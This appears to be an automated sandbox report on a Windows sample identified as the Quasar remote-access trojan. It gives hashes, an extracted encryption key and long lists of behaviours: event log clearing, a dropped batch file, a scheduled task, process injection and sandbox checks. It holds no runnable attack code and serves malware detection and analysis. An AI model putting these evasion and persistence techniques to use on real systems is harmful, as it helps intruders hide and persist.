Analysis
-
max time kernel
149s -
max time network
102s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
24-12-2024 17:00
Static task
static1
Behavioral task
behavioral1
Sample
Compiled/BStub_Onimai.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
Compiled/Stager.exe
Resource
win11-20241007-en
Behavioral task
behavioral3
Sample
Compiled/Ton618.exe
Resource
win11-20241007-en
General
-
Target
Compiled/zovoX.exe
-
Size
2.9MB
-
MD5
1976cb5215470bbbfe6ea766aa2b9253
-
SHA1
a9c899dbc512a5e8356731d4b1804fcbe4f6101b
-
SHA256
dbcc095aa748c9400b3a81781f44dab6cdead04f9abbc5612a49f156c2df3aff
-
SHA512
d6a904f2b0526435179d6d21b2d4021023451dbce44be4308cc83a6fd9d416be74fac0e4f1734005dc53d466b4dc734086ef97d59a2b6783a6d1f66f646be4b3
-
SSDEEP
49152:XrCFFGZ0Ta3c4cF5v+kvvlEY4GO5me+90HPjxVBTvI5C8yXHxoAubGS:bC/la3cZ5v+st3OnxHPjRJ1ObT
Malware Config
Extracted
quasar
-
encryption_key
6DC75341715F183F008C5D5A26E1967745A885D9
-
reconnect_delay
3000
Signatures
-
Quasar family
-
Quasar payload 1 IoCs
resource yara_rule behavioral4/memory/2368-23-0x000000001C360000-0x000000001C9AE000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4964 created 648 4964 powershell.EXE 5 -
Executes dropped EXE 1 IoCs
pid Process 2368 $nya-Loli.bat -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Privacy-Auditing%4Operational.evtx svchost.exe -
pid Process 2360 powershell.exe 4964 powershell.EXE -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\$nya-Loli_ svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3564 set thread context of 4296 3564 powershell.exe 86 PID 4964 set thread context of 1692 4964 powershell.EXE 89 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\$nya-onimai3 zovoX.exe File created C:\Windows\$nya-onimai3\$nya-Loli.bat zovoX.exe File opened for modification C:\Windows\$nya-onimai3\$nya-Loli.bat zovoX.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 24 Dec 2024 17:02:09 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={613D185E-CAA2-4770-9D89-D4AC643A8EB6}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1735059728" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE -
Modifies registry class 40 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApi\Cache = "INetHistory\\BackgroundTransferApi" DllHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\784edc71-a195-4721-a2ab-93c1c77d4 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApi\Cache = ":BackgroundTransferApi:" DllHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApiGroup\ = ":BackgroundTransferApiGroup:" DllHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApiGroup\ = "0" DllHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\784edc71-a195-4721-a2ab-93c1c77d4 = "MicrosoftWindows.Client.CBS_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft svchost.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\784edc71-a195-4721-a2ab-93c1c77d4 = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallowed = 7fce6c6d2556db01 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApi\Cache = "1" DllHost.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApiGroup DllHost.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\784edc71-a195-4721-a2ab-93c1c77d4 = 8c8867722556db01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApi\Cache = "0" DllHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\MuiCache BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApiGroup\ = "INetHistory\\BackgroundTransferApiGroup" DllHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApiGroup\ = "1" DllHost.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\784edc71-a195-4721-a2ab-93c1c77d4 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\784edc71-a195-4721-a2ab-93c1c77d4 = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\784edc71-a195-4721-a2ab-93c1c77d4 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000330a5a722556db01330a5a722556db01330a5a722556db01000000000000000001000000000000000000000000000000280514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800bc003100000000000000000010004d6963726f736f667457696e646f77732e436c69656e742e4342535f6377356e31683274787965777900840009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f0066007400570069006e0064006f00770073002e0043006c00690065006e0074002e004300420053005f006300770035006e003100680032007400780079006500770079000000380060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a006e00310000000000000000001000436f6e73747261696e74496e64657800500009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000043006f006e00730074007200610069006e00740049006e0064006500780000001e00c600310000000000000000001000496e7075745f7b63376363626466612d333937342d343564662d383737632d3061323763393334366363657d00008a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000049006e007000750074005f007b00630037006300630062006400660061002d0033003900370034002d0034003500640066002d0038003700370063002d003000610032003700630039003300340036006300630065007d0000003c000901320000000000985929882000436f6e73747261696e74496e6465782e63616200580009000400efbe98592988985929882e00000000000000000000000000000000000000000000000000cdf89a0043006f006e00730074007200610069006e00740049006e006400650078002e00630061006200000022008f0000002700efbe8100000031535053b79daeff8d1cff43818c84403aa3732d6500000064000000001f0000002a0000004d006900630072006f0073006f0066007400570069006e0064006f00770073002e0043006c00690065006e0074002e004300420053005f006300770035006e003100680032007400780079006500770079000000000000000000000022000000e10000001c000000010000001c0000003400000000000000e00000001800000003000000097bfe331000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f667457696e646f77732e436c69656e742e4342535f6377356e3168327478796577795c4c6f63616c53746174655c436f6e73747261696e74496e6465785c496e7075745f7b63376363626466612d333937342d343564662d383737632d3061323763393334366363657d5c436f6e73747261696e74496e6465782e636162000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000646468786a6a6571000000000000000086959ae777a06d43a2be3d99cebfdbc0a3ae48f5aa84ef11bfd862320a4e209686959ae777a06d43a2be3d99cebfdbc0a3ae48f5aa84ef11bfd862320a4e2096ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d003500350036003500330037003500300038002d0032003700330030003400310035003600340034002d003400380032003500340038003000370035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000004c79797f000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApi DllHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApi\Cache = "9" DllHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\PersistedStorageItemTable\System\784edc71-a195-4721-a2ab-93c1c77d4 = "\\\\?\\Volume{7F79794C-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\\LocalState\\ConstraintIndex\\Input_{c7ccbdfa-3974-45df-877c-0a27c9346cce}\\ConstraintIndex.cab" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallowed = 6f306f6d2556db01 svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApi\Cache = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoftwindows.client.cbs_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApi" DllHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApiGroup\ = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoftwindows.client.cbs_cw5n1h2txyewy\\AC\\INetHistory\\BackgroundTransferApiGroup" DllHost.exe Set value (int) \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache\BackgroundTransferApiGroup\ = "9" DllHost.exe Key created \REGISTRY\USER\S-1-5-21-556537508-2730415644-482548075-1000_Classes\Local Settings taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2360 powershell.exe 2360 powershell.exe 2368 $nya-Loli.bat 2368 $nya-Loli.bat 2368 $nya-Loli.bat 4964 powershell.EXE 4964 powershell.EXE 4964 powershell.EXE 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe 1692 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3360 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
